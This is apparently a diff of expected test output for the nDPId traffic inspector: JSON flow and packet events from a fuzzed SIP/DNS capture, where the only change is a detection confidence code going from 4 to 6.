{"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":1120470084306,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470084306,"pkt":"ADBUADRWAODtAW69CABFAABIaoQAAIARTM3AqAECwKgBAQrAADUANLk4cMwBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":251,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470084827,"flow_last_seen":1120470084827,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470084827,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.37.115","src_port":4292,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00950{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1120470084827,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":417,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":417,"pkt_l4_len":383,"thread_ts_msec":1120470084827,"pkt":"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"} 
-00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":251,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470084827,"flow_last_seen":1120470084827,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470084827,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.37.115","src_port":4292,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":251,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470084827,"flow_last_seen":1120470084827,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470084827,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.37.115","src_port":4292,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":253,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470085969,"flow_last_seen":1120470085969,"flow_idle_time":200000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":0,"thread_ts_msec":1120470085969,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":4901,"dst_port":29440,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00916{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1120470085969,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":389,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":389,"pkt_l4_len":273,"thread_ts_msec":1120470085969,"pkt":"ADBUADRWAODtAW69CABFAAElcwAAAIARzK\/AqAECyER4URMlcwABY9CsQUNLIHNpcDo5NzIzOTI4NzA0NEB2b2lwLmJydWp1bGEubmV0IFNJUC8yLjANCkZyb206ICJhcmlrIiA8c2lwOjgxNjY2NkB2U2lwLmJydXJqdYVhLm5ldD47dGFnPTY0MzNlZjkNCkNhbGwtSUQ6IDEwNTA5MDI1OS00NDZmYWY3YUAxOTIuMTY4LjEuMg0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjo1MDYwO2JyYW5jaD16OWhHNGJLbnAxMDQ5ODQwNTMtNJ9jZTRhNDExOXkuqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470085969,"flow_last_seen":1120470085969,"flow_idle_time":200000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":0,"thread_ts_msec":1120470085969,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":4901,"dst_port":29440,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
+00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470085969,"flow_last_seen":1120470085969,"flow_idle_time":200000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":0,"thread_ts_msec":1120470085969,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":4901,"dst_port":29440,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470086308,"flow_last_seen":1120470086308,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470086308,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"102.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1120470086308,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470086308,"pkt":"ADBUADRmAODtAW69CABFAABIaocAAIARTMrAqAECZqgBAQrAADUANLk4cMwBAAABAACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470086308,"flow_last_seen":1120470086308,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470086308,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"102.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470086308,"flow_last_seen":1120470086308,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470086308,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"102.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":3,"flow_last_seen":1120470088311,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470088311,"pkt":"ADBUADRWAODtAW69CABFAABIaokAAIARTMjAqAECwKgBAQrAADUANLk4cMwhAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":258,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470092317,"flow_last_seen":1120470092317,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470092317,"l3_proto":"ip4","src_ip":"192.98.1.2","dst_ip":"25.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1120470092317,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470092317,"pkt":"ADBUADRWAODtAW69CABFAABIaosAAIARTMbAYgECGagBAQrAADUANLk4cMwBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
-00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470092317,"flow_last_seen":1120470092317,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470092317,"l3_proto":"ip4","src_ip":"192.98.1.2","dst_ip":"25.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470092317,"flow_last_seen":1120470092317,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470092317,"l3_proto":"ip4","src_ip":"192.98.1.2","dst_ip":"25.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470098867,"flow_last_seen":1120470098867,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470098867,"l3_proto":"ip4","src_ip":"192.169.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00951{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1120470098867,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":417,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":417,"pkt_l4_len":383,"thread_ts_msec":1120470098867,"pkt":"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"} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":260,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470098867,"flow_last_seen":1120470098867,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470098867,"l3_proto":"ip4","src_ip":"192.169.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":260,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470098867,"flow_last_seen":1120470098867,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470098867,"l3_proto":"ip4","src_ip":"192.169.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470100319,"flow_last_seen":1120470100319,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470100319,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2753,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1120470100319,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470100319,"pkt":"ADBUADRWAODtAW69CABFAABEao4AAIARTMfAqAECwKgBAQrBADUAMNwvSM4AAAABAAAAAAAAATEBMAEwAzEyNwdUbi1hZGRyBGFycGEAAAwAAQ=="} 
-00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470100319,"flow_last_seen":1120470100319,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470100319,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2753,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.tn-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470100319,"flow_last_seen":1120470100319,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470100319,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2753,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.tn-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":2,"flow_last_seen":1120470100321,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470100321,"pkt":"AODt9W69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CsEAR76rSM6AAAABAAEAAAAAATEBMAEwAzUyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhdGhvc3QA"} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":262,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470100319,"flow_last_seen":1120470100321,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470100321,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2753,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.527.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":262,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470100319,"flow_last_seen":1120470100321,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470100321,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2753,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.527.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":264,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470102883,"flow_last_seen":1120470102883,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470102883,"l3_proto":"ip4","src_ip":"192.86.1.2","dst_ip":"200.68.120.99","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00951{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1120470102883,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":417,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":417,"pkt_l4_len":383,"thread_ts_msec":1120470102883,"pkt":"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"} 00593{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":265,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469921898,"flow_last_seen":1120469930905,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470102883,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2736,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -448,76 +448,76 @@ 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":272,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470114910,"flow_last_seen":1120470114910,"flow_idle_time":620000,"flow_min_l4_payload_len":383,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":383,"midstream":0,"thread_ts_msec":1120470114910,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","l4_proto":118,"flow_datalink":1,"flow_max_packets":3} 00951{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1120470114910,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":417,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":417,"pkt_l4_len":383,"thread_ts_msec":1120470114910,"pkt":"ADBUADRWAOTtAW69CABFAAGTapgAAIB2zIHAqAECyER4URPEE8QBf5mcQ0FOQ0VMIHNpcDo5NzIzOTI4NzA0NEB2b2lwLmJydWp1bGEu2WV0IFNJUC8yLjANClZpYTogU0lQLzIuMC9VRFAgMTkyLjE2OC4xLjI7YnJhbmNoPXo5aEc0YktucDEwNDk4NDA1My00NGNlNGE0MTE5Mi4xNjguMS4yO3Jwb3J0DQpGcm9tOiAiYXJpayIgPKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":2,"flow_last_seen":1120470115340,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470115340,"pkt":"ADBUADRWAODtAW69CABFAABIapkAAIARTLjAqAECwKgBAQrCADUANKwzfc8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaVd5AmRrAAAhAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":273,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470113337,"flow_last_seen":1120470115340,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1120470115340,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberciwy.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":273,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470113337,"flow_last_seen":1120470115340,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1120470115340,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cyberciwy.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469922894,"flow_last_seen":1120469922894,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470116279,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2684,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469924897,"flow_last_seen":1120469924897,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470116279,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.17","src_port":2736,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 